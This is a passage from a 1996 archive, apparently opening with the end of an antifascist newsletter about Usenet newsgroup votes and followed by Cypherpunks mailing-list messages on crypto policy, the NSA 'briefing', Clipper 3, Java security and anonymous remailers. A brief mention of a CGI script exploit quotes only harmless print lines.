the all-time internet record by a factor of two. The results of the
vote, whatever they are and however they were counted, promises to be
equally if not more controversial, particularly because of the two+
month delay between the vote deadline and the announcement of the
results.

I will inform all of you what the vote is as soon as it is posted.

2. "soc.politics.marxism"

Yesterday, May 20 at 22:12 (GMT -04:00), the vote taker Brennan Price
posted a message to "news groups" announcing that the group passed the
vote 355 to 106.

There is now a formal five-day waiting period for people to
comment/protest/etc. on how the vote was counted, the method(s) used to
invalidate ballots, and so forth.

I will also keep you informed of how this discussion unfolds.

3. "talk.politics.natl-socialism" (TPN-S)

R. Graves was the original proponent of TPN-S. He had opposed the
earlier RMW-P group but on technical, not political reasons, and he
does, as he once put it, "not consider [himself] anti-racist." Rather
Graves opposition centered on whether the nazi news group had
demonstrated sufficient interest as a music group, whether it had been
properly proposed in terms of proper USENET/uunet electronic paperwork
at the like.

His version of the Kleim proposal for a nazi group was designed, in
part, to straighten out this paperwork.

Highly skilled technically, Graves seems quite clueless about the
nature of fascism as a political tendency off the internet in the real
world. He has opposed individual cybernazi dirty tricks in cyberspace,
including some first-class technical tracking of cybernazis using
anonymity and other devices to hide their identities. On the other
hand, he has announced, for example, that there are only some one-to-
two thousand hardened nazis in the entire world.

Before the vote on SPM was announced, Graves stated he was "thinking of
dropping" his proposal for the nazi group on the grounds (among others)
that even the cybernazis themselves showed little interest in it.

However, today at 00:35 (GMT -7:00) he posted to "news.groups" under
the subject line "Going forward with talk.politics.natl-socialism after
all" that:

"The recent 60 Minutes interview with Dr. William Pierce, in which Mike
Wallace was obviously uninformed about the person with whom he was
speaking, has reestablished the need, as far as I am concerned, for a
public forum dedicated to the discussion of national socialist
movements. With Milton Kleim's permission, I will list him as an
official co-proponent on the third RFD, for which I believe we just
barely have time."

Kleim accepted almost immediately.

Graves's new view threatens additional ominous organizing by cybernazis
on the net as they go for an additional news group even before the
results of their previous organizing effort is announced.

Nor does Graves's reason for going ahead seem particularly convincing.
A search of the internet reveals only four mentions of Dr. William
Pierce in recent times. One of them is by Graves himself a week or so
before the Wallace interview. The other three were all responses to the
interview. Nor does it seem likely that Mike Wallace or his staff will
be avid readers of Graves's proposed TPN-S. Graves's decision also
comes immediately after the statement that the votes on the earlier
cybernazi proposal RMW-P were counted.

It is possible that Graves's genuinely changed his mind (as did Milton
Kleim) independently of the success of SPM and the vote on RMW-P. But
one wonders how many will be convinced that this is the case versus the
number that will see Graves's reference to Pierce/Wallace as more
rationalization than reason.

Still, until Graves's third version of the proposal is written and
posted there seems little to be gained by any formal speculation on his
motives or those of the cybernazis. Nor, until the vote on RMW-P is
announced does it seem beneficial for new people to closely follow the
post-announcement followups to "news.groups."

I and others will be closely monitoring the group and will keep you
informed of what is happening, what we think the significance is, and
our thinking on how best to support, oppose, or avoid it.

The short time line is uncertain. (Thus I am not even getting this
ready to mail until I have again checked the group when I next log on.)
But for political activists it promises to be an "interesting" summer
and fall.

--tallpaul@nyc.pipeline.com

Post Script to New Readers: This series of letters originated with what
a few of us jokingly call the ANOREV INTERCEPTS. I returned to the
internet in September 1995 after a long absence. Various technical
people who were anti-fascist but not activists had been following
cybernazi organizing attempts in cyberspace. They had assembled a
series of documents and analyses of the nazis, and, knowing that I was
an antifascist activist sent me copies. (Some years ago Anglo/US
intelligence intercepted and decoded some detailed material from Soviet
intelligence that was code-worded VERONA. ANOREV is just that word
spelled backwards.) The ANOREV material proved to be highly accurate.
Based on this, I started the series called "This computer kills
fascists," posting material to friends and other net activists.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 24 May 1996 16:29:25 +0800
To: cypherpunks@toad.com
Subject: Re: Floating Point and Financial Software
Message-ID: <adca79db05021004e8bd@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:40 PM 5/23/96, Paul S. Penrod wrote:

>But there is a simpler method to avoid the problem entirely. There is
>suffcient horsepower in uP's these days to support "long hand" division
>and multiplication. Granted it takes some extra grey matter to write the
>routines, but once done, you can vary the amount of precision to whatever
>you desire and not have to worry about accuracy.

I've been skipping most of the "floatingpointpunks" messags, but will note
that several languages I personally use (however infrequently) have
"bignum" support and support full-precision calculations. These include:
LISP and Scheme, Smalltalk, and Mathematica.

If performance is not an issue, the bignum packages available in C and C++
ought to be sufficient for any financial needs.

And Hal Finney is working on a bignum package for Java.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 24 May 1996 17:02:26 +0800
To: cypherpunks@toad.com
Subject: Truth can sometimes be harmful...
Message-ID: <adca7c3c0602100477ab@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:06 PM 5/23/96, Sandy Sandfort wrote:

>At 12:11 PM 5/23/96 -0800, jim bell wrote:
>
>>Tell ya what: name a weapon that CANNOT be used to harm an
>>innocent person.  Go ahead, I'm waiting.
>
>The Truth?
>

"The coordinates of Hiroshima are...."

Q.E.D.

(And there are thousands of variants of this, where "truth" leads to harm.
Sandy was being terse in his comments, so he may have intended various
qualifications, but as he stated things, my example stands.)

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 24 May 1996 15:35:46 +0800
To: cypherpunks@toad.com
Subject: Re: [SCARE]:  "If you only knew what we know..."
Message-ID: <199605240352.UAA01260@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:06 PM 5/23/96 GMT, John Young wrote:

> 
>"Before the case is resolved, Patel's skepticism of the state's perogatives
>will be tested to the limit when the government is called upon to defend
>its policy. Patel is then likely to be given the *in camera* presentation
>of The Deepest Darkest Secrets of Cryptography -- probably a modified
>version of the classifed briefing the NSA has used with great success to
>influence members of Congress. Legend has it that no one who ever got 'the
>briefing' ever again opposed the agency." 
>Peter, anyone, are these welcome-to-the-inner-circle briefings always by
>NDA, or worse threat? 

It seems to me that if the government REALLY thought it could push GAK by 
convincing the public that it was wise, it would at least prepare a redacted 
version of this briefing that it _could_ present to the public,  if 
different than the "eyes only" version.  After all, would they risk losing 
it all by NOT telling at least part of the story?  Or is their failure to 
publicize all this because they realize that spilling the beans (even only 
some of them) would actually make it _less_ likely that GAK would be 
accepted by the public, rather than more?  I think the latter is much closer 
to the truth.


>Wonder if a public-spirited cryptographer is working on a book for a movie
>about this heart of the deepest darkness? 

That depends on what you mean.  I know a free-lance movie scriptwriter who 
is working on a story along related lines.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 24 May 1996 16:05:41 +0800
To: jim bell <cypherpunks@toad.com
Subject: Re: National Journal article sez net-activism is just	  political hicks
Message-ID: <adca838a070210042f21@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:06 AM 5/24/96, jim bell wrote:
>At 03:31 PM 5/23/96 -0500, Declan McCullagh wrote:

>>>Tommorrow, Washington's politically-powerful National Journal reportedly
>>>will publish a know-nothing piece of "journalism" saying that net-aided
>>>politics is essentially nothing but a batch of ineffective, know-nothing
>>>nerds and back-water political hacks.
>
>At least we now know that the National Journal hasn't heard of
>Cyber-Anarchy--- or they didn't understand one word of it.


What is this "cyber-anarchy" (or "Cyber-Anarchy") you keep talking about?


--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 24 May 1996 13:26:44 +0800
To: cypherpunks@toad.com
Subject: Matt says he didn't get "The Briefing"
Message-ID: <199605240105.VAA27290@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



The claim was that Matt Blaze got "the briefing". I asked him about
this, and this is what he said to me (forwarded with permission).

   I don't think I actually got "the briefing".  They invited the
   seven authors of the key length report down to DC to talk with a
   bunch of policy types, but they never showed us the bodies (or the
   files on us, or whatever it is they show the people who they really
   want to impress).

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Fri, 24 May 1996 16:49:51 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: National Journal article sez net-activism is just political hicks
In-Reply-To: <adca838a070210042f21@[205.199.118.202]>
Message-ID: <Pine.3.89.9605232107.A25751-0100000@well>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 23 May 1996, Timothy C. May wrote:
> >At least we now know that the National Journal hasn't heard of
> >Cyber-Anarchy--- or they didn't understand one word of it.
> 
> 
> What is this "cyber-anarchy" (or "Cyber-Anarchy") you keep talking about?

Heh. Check out http://anarchy-online.dementia.org/book/ for Charles 
Platt's "Anarchy Online."

(Did I mention it here before? Charles talks about a few things we've
discussed here, like the Zundel mirrors, Marty Rimm, and the fight over 
the CDA.)

-Declan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Fri, 24 May 1996 13:05:19 +0800
To: sameer@c2.org
Subject: Re: [SCARE]: "If you only knew what we know..."
In-Reply-To: <199605231937.MAA25268@clotho.c2.org>
Message-ID: <199605240112.VAA20633@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


I don't think I actually got "the breifing", if any such standard briefing 
actually exists.  What Sameer is probably thinking of is that the seven
authors of the "key length report" were invited down to DC to talk with a
bunch of high-level policy types, but they never showed us the bodies (or
the files on us, or whatever it is they show the people who they really want
to impress).

-matt

[NB, please send any reply directly to me; I don't read the list with any
regularity these days, and saw this message only because someone mentioned
it.  thanks.  -matt]


> > 
> > Paraphrasing the "Wired" item, "No person who has ever received "The
> > Briefing" has ever again argued forcefully for the rights of citizens to
> > use strong cryptography."
> 
> 	It's my understanding that this statement is now false. I
> believe that Matt Blaze recently received "The Briefing" and he is
> still on our side.
> 	(I personally think it was a mistake on their part to give him
> said Briefing, as they should have realized he couldn't be
> converted. Now that someone has "withstood the Briefing" it gives them
> less credibility.)
> 
> 
> -- 
> Sameer Parekh					Voice:   510-601-9777x3
> Community ConneXion, Inc.			FAX:     510-601-9734
> The Internet Privacy Provider			Dialin:  510-658-6376
> http://www.c2.net/ (or login as "guest")		sameer@c2.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Fri, 24 May 1996 13:40:11 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: [SCARE]:  "If you only knew what we know..."
In-Reply-To: <adca03eb020210043329@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.960523212625.12828A-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


If I were planning such a briefing I'd probably concentrate on real cases 
that were cracked due to NSA SIGINT - especially terrorist groups 
operating with only limited state sponsorship

Simon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Fri, 24 May 1996 16:03:02 +0800
To: Jim Choate <ravage@ssz.com>
Subject: Re: Innocence & harmless weapons
In-Reply-To: <199605232202.RAA22518@einstein.ssz.com>
Message-ID: <Pine.SUN.3.91.960523212712.26804A-100000@crl8.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Thu, 23 May 1996, Jim Choate wrote:

> Hi Sandy et al.,
> 
> Whose side of the truth?

That was a capital "T", bub.  Truth doesn't have sides.  (Think
of it as an archetype.)

> To be honest I was surprised by your simplistic responce.

That was a question mark, bub.  It wasn't an answer, it was
a question.  Hey, the devil is in the details, gang.  Too bad
modern schools teach "self-esteem" instead of reading, writing
and rhetoric.  (Spelling wouldn't hurt either.)


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 24 May 1996 17:40:52 +0800
To: cypherpunks@toad.com
Subject: Re: National Journal article sez net-activism is just  political hicks
Message-ID: <199605240443.VAA03981@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:05 PM 5/23/96 -0700, Timothy C. May wrote:
>At 3:06 AM 5/24/96, jim bell wrote:
>>At 03:31 PM 5/23/96 -0500, Declan McCullagh wrote:
>
>>>>Tommorrow, Washington's politically-powerful National Journal reportedly
>>>>will publish a know-nothing piece of "journalism" saying that net-aided
>>>>politics is essentially nothing but a batch of ineffective, know-nothing
>>>>nerds and back-water political hacks.
>>
>>At least we now know that the National Journal hasn't heard of
>>Cyber-Anarchy--- or they didn't understand one word of it.
>
>
>What is this "cyber-anarchy" (or "Cyber-Anarchy") you keep talking about?

(Yeah, yeah.  Okay, I forgot the trademark.  But I still can't find the 
"circle-C" on my keyboard!)

That's exactly the reaction of the typical mainstream media news person 
today.  But that will change, I think, and probably well within a couple of 
years.  

I keep waiting for Time magazine to declare the Internet to be "The Man of 
the Year", like they did the (personal?) computer in one year in the middle 
1980's.  It has certainly been covered far more this year than any year in 
the past.  Now that the traditional media has discovered the Internet, 
they'd damn well start covering its political implications.  

Last year, for instance, the media was apparently unwilling to admit that 
the main reason the Congressional hearings on Waco occurred was because the 
subject was kept alive on the computer networks.  By next year, I don't 
think they'll be able to keep silent on similar situations:  Too many people 
will consider the Internet to be at least their secondary news source, if 
not their primary one.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Fri, 24 May 1996 10:57:23 +0800
To: cypherpunks@toad.com
Subject: Re: CLI_pr3
Message-ID: <199605232145.VAA08342@pipe2.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On May 23, 1996 10:41:13, 'tcmay@got.net (Timothy C. May)' wrote: 
 
>Of course, this appears to be implying that _domestic_ data will be
subject 
>to Clipper 3  restrictions, else this statement is meaningless. 
> 
>So, will my stored-value cards that I "charge up" in California and carry 
>in my wallet to Zurich be GAKked? If not, Morris's statement is 
>meaningless. If so, domestic data is intended to be GAKked. 
> 
>(But we knew this, didn't we?) 
 
 
   Several news reports in the last few days seem to be aiming 
   at raising the alarm about crypto, perhaps in response to 
   the various crypto bills, administration reformulations, 
   and studies such as that headed by Herb Lin. 
 
   The recycling of the news of DoD break-ins supposedly due 
   to heavy military reliance on the Internet; the drumbeat of 
   conferences, press releases and planted stories on 
   international money laundering, the hazards of E-money to 
   the stability of the banking system, spreading "Russian" 
   criminality, and the role of high-technology in each; global 
   Chinese arms dealers and copyright pirates; thousands of 
   Japanese spies needed to combat "Asian" threats. 
 
   These scares might well be orchestrated in support of 
   Clipper 3 -- to the mutual benefit of international  
   governments and commerce as stated by the IWGCP report. 
 
   The Clipper 3 report, as John Gilmore and others have 
   noted, aims at an international clampdown on non-GAKed 
   crypto. For this to work, all the major crypto players must 
   agree to act at the same time so that no one gets an 
   advantage by offering non-GAKed products. 
 
   But is it not probable that there will be a holdout 
   nation(s), like the Swiss in war and bank secrecy, to offer 
   crypto that is non-GAKed? Or will a holdout be starved? 
 
   Or is it more likely that the genuine alternative to 
   multilateral governmental regulation is going to be small- 
   scale, non-corporate, private parties, insusceptible to 
   large-sacle governmental-market coercion, willing to offer 
   risky, covert services, perhaps as lucrative as prohibited 
   armaments? 
 
   In such a case, for example, would not a highly skilled 
   cryptographer, let us call her Mathilda Blaze, be able to 
   sell covert crypto (on the side, encrypted transactions, 
   anonymity assured) for far greater reward than a not-very- 
   secure pittance and pension at a downsizing ATT, or NSA, or 
   Russia, China, Israel, France, UK, NL, JP ... ? 
 
   To be sure, if we knew what they knew, we would understand 
   why the House has just increased the intelligence budget to 
   $30bn, $2bn more than 1996 (WaPo 5-23-96). 
 
   Maybe all the major crypto nations (gov-and-com), are 
   minting E-money to pay their best techies to protect their 
   secrets. If so, may the best algorithmist take 'em all to 
   the cleaners -- just remember to share with the hackers 
   spooking the spooks-and-crooks of gov-com intel-insec, 
   and causing "Yo, man's" of recognition and admiration of  
   those peering for pennies at ELINT and NetSec screens. 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@MIT.EDU>
Date: Fri, 24 May 1996 13:37:12 +0800
To: (Recipient list suppressed)
Subject: Trust In A Cryptographic Economy And Digital Security Deposits: Protocols And Policies
Message-ID: <9605240148.AA19641@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


My thesis "Trust In A Cryptographic Economy And Digital Security Deposits:
Protocols And Policies" is now available in digital form for those that
might be interested.

You can find it on my ecommerce page at:

http://farnsworth.mit.edu/~reagle/commerce/commerce.html

An intro, table of contents, conclusion, and the refs are in html format.
You may download the whole thing as compressed postscript.
_______________________
Regards,            When we ask advice, we are usually looking for 
                    an accomplice. -Marquis de la Grange
Joseph  Reagle      http://farnsworth.mit.edu/~reagle/home.html
reagle@mit.edu      E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 24 May 1996 14:21:43 +0800
To: mrm@netcom.com (Marianne Mueller)
Subject: Re: VIRUS ALERT: Java virus that affects Netscape 2.0 & 2.01.
In-Reply-To: <199605240129.SAA00250@netcom20.netcom.com>
Message-ID: <199605240220.WAA27452@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Marianne Mueller writes:
> In the "for what it's worth dept", the security breaches that have gotten
> so much press are fixed in JDK 1.0.2, our current release, and in NN3.0b4. 
> This includes the bug mentioned in the May 18 NY Times story. 

The problem, Marianne, is that Java security has become a total
industry joke.

When Java came out, we were assured it was secure. Then we were
assured it was Beta software but real Java as released would be
secure. Then we were told that it was mostly secure, and anyway bugs
are fixed quickly, and anyway they aren't serious in general, maybe.

In short, you are starting to look very defensive and very unreliable.

The bugs show up on a weekly basis. This is because the underlying
security model is flawed. No amount of denial on your part is going to
fix that.

Sadly, Java hype has become a giant industry, and the hype machine
assures that honesty about Java is going to continue to decline. Java
has become a major stock booster for Sun and other
companies. Congenital Java security holes aren't going to get serious
attention because whether one likes it or not Sun's stock is impacted
by the whole thing.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Fri, 24 May 1996 17:05:42 +0800
To: cypherpunks@toad.com
Subject: Re: [AP] [NOISE] Re: PROPOSAL
In-Reply-To: <v03006f00adca53b7fdc2@[206.151.234.118]>
Message-ID: <X7VeoD59w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Paul Robichaux <paul@ljl.COM> writes:
> Uni (for whom I have great esteem and no little curiosity about why he lets
> Bell send him off into the weeds) said:

I think they're both having fun, as am I.

> >Motion: To create the alt.politics.assassination.politics newsgroup and
> >the "AP" mailing list so as to clear the meaningless traffic (for which I
> >am significantly responsible) out of this forum.
> >
> >Any seconds?
>
>
> Seconded enthusiastically. All in favor, see you in alt.config.

Objection. talk.politics.assassination is already available on some Usenet
servers. The propagation is appropriate. No new newsgroups are necessary.
Tell the nuriweiller Sovok to take his crituque of AP there.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 24 May 1996 17:32:23 +0800
To: cypherpunks@toad.com
Subject: Cyber-Anarchy
Message-ID: <adcaa0e10802100413c3@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:41 AM 5/24/96, jim bell wrote:
>At 09:05 PM 5/23/96 -0700, Timothy C. May wrote:
>>At 3:06 AM 5/24/96, jim bell wrote:

>>>At least we now know that the National Journal hasn't heard of
>>>Cyber-Anarchy--- or they didn't understand one word of it.
>>
>>
>>What is this "cyber-anarchy" (or "Cyber-Anarchy") you keep talking about?
>
>(Yeah, yeah.  Okay, I forgot the trademark.  But I still can't find the
>"circle-C" on my keyboard!)


My point is actually not so much one of claiming credit for something I've
been involved with since 1988, as being somewhat critical of the
all-too-common tendency I see of _renaming_ something without adding any
new content.

Jim Bell calls his set of ideas "cyber-anarchy," and certain journalists
have picked up on this (as with the Australian article).

But with the exception of the one variant of anonymous markets, namely,
"assassination politics," most or all of the other ideas of his
"cyber-anarchy" seem to be encompassed by the already-existing term.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hendersn@zeta.org.au (Zed)
Date: Fri, 24 May 1996 02:27:12 +0800
To: cypherpunks@toad.com
Subject: Re: Long-Lived Remailers
Message-ID: <199605231319.XAA19785@godzilla.zeta.org.au>
MIME-Version: 1.0
Content-Type: text/plain


>Ideally the final emanation point will be epherimal indeed.  Perhaps only a
>few minutes or an hour or two.

I really like this idea. How about instead of a full-scale remailer being
the final jump of the message, you have a _very_ simple remailer set up
along the lines of anon.penet.fi. No encryption, just strip off the headers
and send the message to its final destination. Sorry for being clueless in
how this works(I'm learning as fast as I can), but wouldn't this kind of
system be incredibly easy to start up and fold? You could have a host of
such final emanation points winking in and out of existence while the actual
encrypting remailers remain relatively safe.
  Zed(hendersn@zeta.org.au)
"Don't hate the media, become the media" - Jello Biafra
  PGP key on request





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 24 May 1996 18:13:56 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Children's Privacy Act
In-Reply-To: <adca67d204021004ac12@[205.199.118.202]>
Message-ID: <Pine.GUL.3.93.960523233809.22413l-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 23 May 1996, Timothy C. May wrote:

> We at LolitaWatch GMBH are amused that legislators in the United States are
> attempting to legislate that which can be so easily bypassed with the
> world-wide Internet.
[...]
> Danish laws are not so repressive as American laws, and our American
> friends can so easily access our data bases of information derived from the
> mandatory age-labeling tags you Americans so conveniently (for us) insist
> upon.

Good and valid points about the CPA's hypocrisy and inanity, but this
doesn't really address the bill (was it meant to?). 

CDA + CPA = bad. CDA = bad. CPA is still indeterminate.

I recognize that criminalizing the free flow of information is like trying
to stick your finger in a dike, but every little bit has an effect. In
this case, I'd call it a positive effect. 

I was certainly disappointed to hear a couple of cypherpunks the other day
discussing for-profit offshore data havens full of personal information
that is illegal to collect in the US as a business opportunity *they* were
interested in pursuing. I just can't see myself doing that, for anybody.
Gubmint or private, doesn't matter.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Fri, 24 May 1996 17:01:41 +0800
To: cypherpunks@toad.com
Subject: Re: Innocence & harmless weapons (fwd)
Message-ID: <199605240530.AAA23158@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 23 May 1996 21:35:57 -0700 (PDT)
> From: Sandy Sandfort <sandfort@crl.com>
> Subject: Re: Innocence & harmless weapons
>
> > Whose side of the truth?
> 
> That was a capital "T", bub.  Truth doesn't have sides.  (Think
> of it as an archetype.)

Sorry but the very fact that I don't agree with you is proof enough that
there is no absolute 'Truth' as you use it. That is  unless you are
attempting to claim absolute omnipotence on the point of determination.

> > To be honest I was surprised by your simplistic responce.
> 
> That was a question mark, bub.  It wasn't an answer, it was
> a question.  Hey, the devil is in the details, gang.  Too bad
> modern schools teach "self-esteem" instead of reading, writing
> and rhetoric.  (Spelling wouldn't hurt either.)

Nice tactical ploy, an ad hominem buried in a straw man argument.


                                            Jim Choate





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Rogaski" <wendigo@gti.net>
Date: Fri, 24 May 1996 16:08:54 +0800
To: mrm@netcom.com (Marianne Mueller)
Subject: Re: VIRUS ALERT: Java virus that affects Netscape 2.0 & 2.01.
In-Reply-To: <199605240129.SAA00250@netcom20.netcom.com>
Message-ID: <199605240431.AAA28575@apollo.gti.net>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

An entity claiming to be Marianne Mueller wrote:
: 
: We've reached urban legend time for Java...?   
: 
: There is no Java virus known as "Black Widow".  There was a melodramatic
: web article about Java security that used the title "Black Widow", a pun
: on the web.  The article focused mostly on the danger of denial-of-service

"Black Widow" was the calling card of a little script called 'latro' that
exploited the stupidity of certain webmasters who put perl.exe in the
cgi-bin directory on PC-based webservers.  The default code to execute
on the remote machine was:


print "If I were nasty, you'd be spiderfood by now.\n";

print "\n\n\t--the black widow\n";


- -- 
    Mark Rogaski   | Why read when you can just sit and |      Member
  GTI System Admin |         stare at things?           | Programmers Local
  wendigo@gti.net  | Any expressed opinions are my own  |     # 0xfffe
 wendigo@pobox.com | unless they can get me in trouble. |     APL-CPIO


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMaU7oA0HmAyu61cJAQGxHQP+OkDD+v4FhAQynhI4V2GpwilaOEoxlow0
Y5s1g8YkIYuApvxAU8eyFfqmlp8fG1rnc4mITXmvYGj66Wy5L/n2npfXTo45KAHc
VRr7qT7HeEFwgunMCnJcZ+7CtlAKpXn6siuenUEl4gqRjApmFI/pLSXna4sbG4v8
1tNAcyOITmk=
=McGt
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Fri, 24 May 1996 18:37:08 +0800
To: cypherpunks@toad.com
Subject: Re: [SCARE]:  "If you only knew what we know..."
In-Reply-To: <199605240352.UAA01260@mail.pacifier.com>
Message-ID: <199605240642.BAA00623@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> Patel is then likely to be given the *in camera* presentation
> of The Deepest Darkest Secrets of Cryptography -- probably a modified
> version of the classifed briefing the NSA has used with great success to
> influence members of Congress. Legend has it that no one who ever got 'the
> briefing' ever again opposed the agency." 

The last part reminds me of the Monty Python bit about the funniest joke
in the world -- during the war Brittish soldiers would shout out a
translated version they couldn't understand and the Germans would die
laughing.  It seems pretty obvious that there are people who have
withstood the NSA's siren song -- people in Congress and agencies like the
Department of Commerce (who presumably have heard it) oppose the agency. 

I've felt for a long time that the division in venues has hurt us.  The
other side pitches in secret to Congressmen and administration officials,
while we preach to the converted and argue against straw men here on the
net.  As a consequence they own official Washington and we own public
opinion. 

The problem with this is that we don't get a chance to refute their 
arguments.  I think we're right -- and to me believing we're right means 
beliving that we can win a fair fight.  Logic and the facts ought to bear 
us out.

One idea that I toyed around with but was too lazy to pursue was to have a
public debate on the web.  A small group of people would be invited to
participate -- maybe Dr. Denning on one side, and whoever else we could
find to speak for the government.  We could pick an equal number of our
best people to go up against them. 

The debate would proceed in rounds.  Each particpant could write his or
her arguments for or against government restrictions on crypto, and the
moderator would publish them all simultaneously.  Then there would a set 
period of time for the participants to write responses -- maybe a couple 
of days or a week.  Then another round of responses to the responses.  
After that everyone could write closing arguments.

I think there are a couple of advantages to taking this sort of an
approach rather than a more free form discussion on a mail list.  The
first is that the other side would probably feel more welcome -- the lack
of public support for their position and the net being what it is have
combined to create a hostile environment for those who disagree with us. 
The debate would prevent personal attacks (if we pick the right
participants) and it would give the opposition some assurances that they
won't get shouted down.  The idea is to create a level playing field --
something that doesn't exist anywhere right now -- each side has it's own
home court, but a neutral space doesn't seem to exist.

Another advantage would be that if people agree to particpate they'd
probably take it seriously enough to follow through and answer criticisms
of their arguments.  The idea of a formal discussion with a beginning, a
middle, and an end might help keep things moving along.  Restricting
things to a small number of participants who understand the technology and
the history of crypto politics could also be helpful.

Finally, when the whole thing was over the web site would be a valuable 
resource for anyone who wants to explore the issue.  Both sides would be 
there nobody would feel that they had been bullied or manipulated into 
